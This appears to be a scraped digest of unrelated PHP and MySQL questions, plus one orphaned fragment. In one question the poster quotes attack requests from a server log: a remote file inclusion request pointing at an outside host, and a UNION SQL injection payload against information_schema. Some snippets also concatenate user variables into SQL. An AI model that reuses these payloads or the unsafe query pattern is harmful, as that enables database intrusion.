• Best method of Zend Framework caching

  I have a blog built using Zend Framework, which I realize might be a bit overkill for a blog alone, but I am planning on adding other features in the future. Nevertheless, I've noticed pages could be a little speedier. I've done a basic caching method that basically captures everything in index.php (Core frontend and File backend), which works great, but unfortunately it also prevents dynamic page contents from updating (messages like "this was posted 5 minutes ago", etc) until the cache period expires. So my question is what would be the best method of caching to improve performance? I am doing fairly basic queries which are mostly simple selects, not many joins or anything fancy (using Zend_Db_Table), and even on a small database page loads are a little sluggish. Is it worth it to cache queries or should I focus my time elsewhere?

• How to 'insert if not exists' in MySQL?

  I started by googling, and found this article which talks about mutex tables. I have a table with ~14 million records. If I want to add more data in the same format, is there a way to ensure the record I want to insert does not already exist without using a pair of queries (ie, one query to check and one to insert is the result set is empty)? Does a unique constraint on a field guarantee the insert will fail if it's already there? It seems that with merely a constraint, when I issue the insert via php, the script croaks.

  I have found Design patterns certification at the Brainbehch. I have heard from people who passed it, that there are many Language-specific patterns questions, mostly from Java and C++. I think that this certification can: force me to improve my skills on Object oriented design and design patterns; improve and structure my knowledge of the domain; give real estimate of my knowledge, which is useful issue itself The only confusion I have about this certification, is that I have to learn C++/Java language specific design patterns, while I mostly do PHP development and don't want to switch to C++/Java. I'm familiar with Java & C++ syntax, read lots of books about different subjects with code snippets in this programming languages. I think, that if I pass well all concepts except language specific patterns at certification, it won't be very good, because this concepts will gain quite low results. What would you recommend in this particular circumstance?

  is it possible to make Config files for each and every users? Currently i have a Config file named Siteconfig.php for global configuration. Now a user registered,so that i need a configuration file for that user. I have a BANNER ,user uploads images to the server and select some images for that banner.   In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example: /?x=19&y=15 The numbers are random, but its always setting x and y variables. Another category of mysterious requests: /?id=http://nic.bupt.edu.cn/media/j1.txt?? There are other attempts at injections in the request log that have straight sql written into them as well. Example: /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13-- It looks like they are all reaching a 404, but I'm still wondering about the intent behind these. I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason. Any suggestions as to what all these are?

Nothing from behind the colon is there though. How should I 'escape' it so that the colon is properly recognized? Its PHP... Thanks

  I am using Kohana (v3) framework but I believe it's not tied to a particular framework. What I have is basically an app with a front-end, where I want to use Kohana's native Kohana::shutdown_handler(), but I also have a part of the - RESTful API - where I don't want colourful and html-encoded exception reporting. I want a plain text reporting. The way I thought it might work is to register another shutdown function in API's controller abstract class constructor, but then I realised register_shutdown_function() works differently to set_exception_handler() and instead of replacing it adds another function to the shutdown procedure. What's worse PHP doesn't allow "unregistering" shutdown functions and that's where my problem lies. What to do, if you want to use another shutdown function instead of one already registered?

• Can I use a single MySQL query to select distinct rows and then non-distinct rows if a limit hasn't

  I hope I'm explaining this properly, my knowledge of MySQL is quite limited. Let's say I have a table with rows that have name and shape fields. I'd like to select a bunch of rows from a table, but return all of the rows with unique shape field values first. If I have less than a certain number of rows, let's say 7, then I'd like to fill the remaining result rows with non-unique shape rows. The best way I can word it is that they're "ordered by uniqueness, and then by some other value". So, I don't want: square, square, circle, circle, rectangle, square, triangle I'd like to have: square, circle, rectangle, triangle, square, square, circle Is this possible to do using a single SQL query? I'm using MySQL with PHP, if that makes any difference. Thanks!

• Two-key encryption/decryption?

  I'm looking to store some fairly sensitive data using PHP and MySQL and will be using some form of reversible encryption to do so since I need to get the data back out in plain text for it to be of any use. I'll be deriving the encryption key from the users' username/password combination but I'm stumped for what to do in the (inevitable) event of a password being forgotten. I realise that the purpose of encryption is that it can only be undone using the correct key but this must have been addressed before.. I'm trying to get my head around whether or not public key cryptography would apply to the problem but all I can think of is that the private key will still need to be correct to decrypt the data.. Any ideas?

• mySql Delete only removes the data not the entire entry

  Hi all I have this line in my php code $insert = "DELETE FROM allocation_table WHERE job = '$jobnumber' " ; Mysql_query ($insert) ; The problem is it will remove all the values from the the one line in my table but not the entry itself. as you can see in the picture if I delete where job = 315 , it does not delete the line but does delete all the entries Yet in this code that preceeds it (a different table) . it works fine and the whole line is removed $insert = "DELETE FROM event WHERE jobnumber = '$jobnumber' " ; mysql_query ($insert) ;enter code here can anyone offer some advice please ??

  I'm trying to pass 3 parameter to a script, where the 3rd parameter $_GET['value3'] is supposed to be an array $_GET['value1'] $_GET['value2'] $_GET['value3'] //an array of items I'm calling the script like this: (notice my syntax for value3, I'm not sure it's correct) http://localhost/test.php?value1=test1&value2=test2&value3=[the, array, values] I then use a foreach to hopefully loop through the third parameter value3 which is the array //process the first input $_GET['value1'] //process the second input $_GET['value2'] //process the third input $_GET['value3'] which is the array foreach($_GET['value3'] as $arrayitem){ echo $arrayitem; } but I get the error Invalid argument supplied for foreach() I'm not sure if my methodology is correct.   PHP has many built-in functions to validate numbers but they all expect input in computer format: 1234.56. I need to validate stuff like 1,234.56 (English) or 1.234,56 (Spanish), together with some typical attributes (accepted range, max number of decimals, etc.). I started writing my own function but I soon got lost. It's easy to read the user input into a float variable but I want to be able to detect numbers with invalid formats like 1,23456.7 or 1..25. Do you have any recommendation on the subject? (Decimal and thousand characters are known beforehand and it's okay to hard-code digit groups as three, there's no need to cover Indian number format.)
